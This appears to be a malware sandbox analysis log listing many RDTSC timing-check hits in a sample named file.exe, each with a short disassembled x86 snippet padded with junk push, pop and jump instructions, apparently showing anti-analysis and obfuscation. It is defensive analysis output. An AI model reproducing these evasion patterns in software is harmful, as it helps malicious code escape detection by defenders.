Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B51B67 second address: B51B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F5E78823264h 0x0000000e jns 00007F5E7882325Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B51B91 second address: B51B9B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E792621F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5292A second address: B52932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B52AA8 second address: B52AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B52AAC second address: B52AB5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B52E8A second address: B52E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B52E93 second address: B52EB0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F5E78823266h 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B551B3 second address: B551B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B551B7 second address: B551BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B582CD second address: B582D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B582D2 second address: B582D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57E55 second address: B57E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57E59 second address: B57E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57E64 second address: B57E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57E6A second address: B57E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jns 00007F5E78823274h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57E97 second address: B57E9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57FF3 second address: B5800C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F5E78823260h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5D4B3 second address: B5D4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5D5FE second address: B5D61A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E78823260h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5D61A second address: B5D635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jmp 00007F5E792621F4h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5DA32 second address: B5DA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5E78823256h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnc 00007F5E7882325Ch 0x00000013 pushad 0x00000014 jmp 00007F5E7882325Fh 0x00000019 jmp 00007F5E78823265h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6377E second address: B63782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B63782 second address: B63788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6206F second address: B620B4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F5E792621F8h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F5E792621ECh 0x00000013 jl 00007F5E792621E6h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F5E792621F5h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B620B4 second address: B620BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B620BA second address: B620D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E792621F5h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B62355 second address: B62381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E78823260h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E78823265h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B62381 second address: B6238B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E792621E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B62808 second address: B6280C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B163A6 second address: B163B0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6297C second address: B62980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B674A9 second address: B674B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5E792621E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B674B3 second address: B674C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E7882325Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B674C6 second address: B674CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B667DD second address: B667E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B667E3 second address: B667FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F5E79262213h 0x0000000d jl 00007F5E792621E8h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B667FC second address: B66800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B66C54 second address: B66C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B66D9A second address: B66D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67035 second address: B6703E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6F470 second address: B6F476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6DAAC second address: B6DABD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E792621EBh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6DABD second address: B6DAC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E38C second address: B6E392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1634A second address: B163A6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E78823256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F5E78823258h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov dx, bx 0x0000002a mov ebx, dword ptr [ebp+12485316h] 0x00000030 mov edx, dword ptr [ebp+122D2A37h] 0x00000036 add eax, ebx 0x00000038 mov dword ptr [ebp+1244D4E8h], edi 0x0000003e nop 0x0000003f jno 00007F5E78823264h 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 push esi 0x0000004a pop esi 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6EE87 second address: B6EE8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6EE8B second address: B6EE98 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5E78823256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6EE98 second address: B6EEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6EEA5 second address: B6EEA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6EEA9 second address: B6EEB3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E792621E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B724B7 second address: B724BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B724BB second address: B724C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B724C6 second address: B724CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B724CC second address: B724D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B724D2 second address: B724DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B72684 second address: B72689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B72689 second address: B7269A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jo 00007F5E78823256h 0x0000000b pop edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7269A second address: B726A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B727E4 second address: B727EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B727EA second address: B727EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B727EE second address: B727F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B727F2 second address: B7280C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5E792621F0h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B779A3 second address: B779B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E7882325Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B779B2 second address: B779BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B779BC second address: B779C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81E75 second address: B81E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007F5E792621ECh 0x0000000b je 00007F5E792621E6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81E8D second address: B81EAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5E78823256h 0x0000000a jmp 00007F5E78823265h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80123 second address: B80129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80129 second address: B8012E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8012E second address: B8014C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E792621F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8014C second address: B80152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80561 second address: B80569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80569 second address: B8058A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E78823262h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8058A second address: B80594 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B806B7 second address: B806D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F5E78823256h 0x00000009 jmp 00007F5E7882325Fh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B806D9 second address: B806DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80B21 second address: B80B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E78823266h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80B3D second address: B80B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80B42 second address: B80B72 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E7882326Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jno 00007F5E7882325Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80CBD second address: B80CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81622 second address: B81653 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E7882325Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E78823265h 0x00000011 jg 00007F5E78823256h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81653 second address: B81668 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5E792621E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jne 00007F5E792621E6h 0x00000011 pop edx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85EAC second address: B85EC0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E78823256h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F5E7882325Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B88F47 second address: B88F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B973DB second address: B973DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B973DF second address: B973E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B973E3 second address: B973E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B973E9 second address: B97416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5E792621F6h 0x0000000c jmp 00007F5E792621EEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B99769 second address: B9976F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B998B7 second address: B998BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B998BE second address: B998DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E78823264h 0x00000007 pushad 0x00000008 jo 00007F5E78823256h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA8C27 second address: BA8C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA8C2D second address: BA8C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F5E7882325Fh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA8AD0 second address: BA8ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 jnp 00007F5E792621FAh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA8ADF second address: BA8AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAA5AE second address: BAA5B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAA5B7 second address: BAA5C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a jbe 00007F5E78823256h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAA5C9 second address: BAA5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push edi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2DF8 second address: BB2DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2DFE second address: BB2E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB30FF second address: BB3115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E78823260h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB8074 second address: BB8078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
